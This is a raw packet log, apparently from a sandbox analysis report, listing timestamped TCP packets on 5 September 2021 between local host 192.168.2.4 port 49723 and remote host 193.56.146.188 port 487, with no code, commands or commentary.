Sep 5, 2021 15:50:10.817033052 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817043066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817080021 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817121029 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817121983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817157984 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817197084 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817199945 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817235947 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817272902 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817277908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817312002 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817349911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817354918 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817398071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817440987 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817442894 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817476988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817514896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817517996 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817552090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817586899 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817593098 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817625046 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817662001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817662954 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817708015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817747116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.817750931 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817786932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.817828894 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.888259888 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888319969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888358116 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888395071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888425112 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.888432026 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888479948 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888525009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888562918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888624907 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.888637066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.888642073 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.888940096 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.888978958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889015913 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889050007 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889053106 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889090061 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889127970 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889164925 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889211893 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889213085 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889223099 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889256001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889281988 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889293909 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889332056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889362097 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889370918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889406919 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889446020 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889447927 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889482975 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889497995 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889529943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889571905 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889584064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889609098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889647007 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889662981 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889686108 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889722109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889744043 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889760017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889797926 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889811993 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889843941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889897108 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.889899969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.889949083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890000105 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890001059 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890038013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890074015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890089989 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890110970 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890146971 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890166998 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890192986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890235901 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890249014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890270948 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890310049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890322924 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890347004 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890383959 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890410900 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890423059 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890460968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890474081 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.890506983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.890566111 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.958152056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958218098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958260059 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958298922 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958338022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958349943 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.958380938 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.958400011 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958444118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958451986 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.958482981 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.958538055 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.959956884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960000992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960038900 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960072041 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960074902 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960114002 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960134029 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960151911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960200071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960213900 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960244894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960283995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960299015 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960321903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960360050 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960377932 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960397005 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960433960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960449934 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960472107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960520029 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960522890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960562944 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960601091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960621119 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960644960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960683107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960700989 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960725069 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960762978 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960772991 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960800886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960850000 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960851908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.960891962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960927963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960958004 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.960987091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961016893 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961045980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961076021 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961100101 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.961112976 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961157084 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.961162090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961215019 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961234093 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.961252928 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961301088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961322069 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.961343050 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961380959 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961405039 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.961419106 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961457968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961477995 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.961493969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:10.961544991 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.980344057 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:10.980918884 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.027956009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028022051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028059006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028089046 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028127909 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028153896 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028166056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028181076 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028203964 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028223038 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028239012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028281927 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028287888 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028317928 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028364897 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028366089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028407097 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028445005 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028462887 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028481960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028521061 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028531075 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028557062 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028594017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028606892 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028630018 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028676033 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028680086 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028717041 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028754950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028773069 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028793097 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028830051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028845072 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028866053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028904915 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028917074 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.028942108 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028989077 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.028990030 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029031992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029069901 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029081106 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029108047 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029145956 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029160023 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029181004 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029217958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029230118 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029256105 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029303074 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029309034 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029345036 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029381037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029392004 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029418945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029457092 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029469967 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029493093 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029531002 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029541969 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029567957 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029614925 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029616117 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029654980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029692888 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029705048 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029730082 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029766083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029778004 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029802084 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029840946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029851913 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029879093 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029923916 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.029930115 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.029966116 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030003071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030019045 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030040979 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030077934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030092955 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030113935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030150890 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030163050 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030188084 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030234098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030237913 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030277014 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030313969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030325890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030352116 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030401945 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030668020 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030709982 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030745983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030780077 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030785084 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030822992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030841112 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030858040 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030895948 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030909061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.030931950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030977964 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.030985117 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.031018972 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.031054974 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.031070948 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032478094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032524109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032561064 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032567978 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032597065 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032615900 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032634974 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032672882 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032685995 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032718897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032761097 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032772064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032795906 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032834053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032840967 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032871962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032907963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032921076 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.032946110 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032983065 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.032999039 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.033027887 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033068895 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033080101 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.033104897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033142090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033154011 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.033179045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033215046 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033236027 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.033253908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.033308983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050103903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050159931 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050187111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050321102 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050388098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050422907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050462008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050467968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050507069 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050518036 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050542116 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050578117 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050589085 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050611019 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050643921 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050658941 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050678015 CEST	487	49723	193.56.146.188	192.168.2.4
